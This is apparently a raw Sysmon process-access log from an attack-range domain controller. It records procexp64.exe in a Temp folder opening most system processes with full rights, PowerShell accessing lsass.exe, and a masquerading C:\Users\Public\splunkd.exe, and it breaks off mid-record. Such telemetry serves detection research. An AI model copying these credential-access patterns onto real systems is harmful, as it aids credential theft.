15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 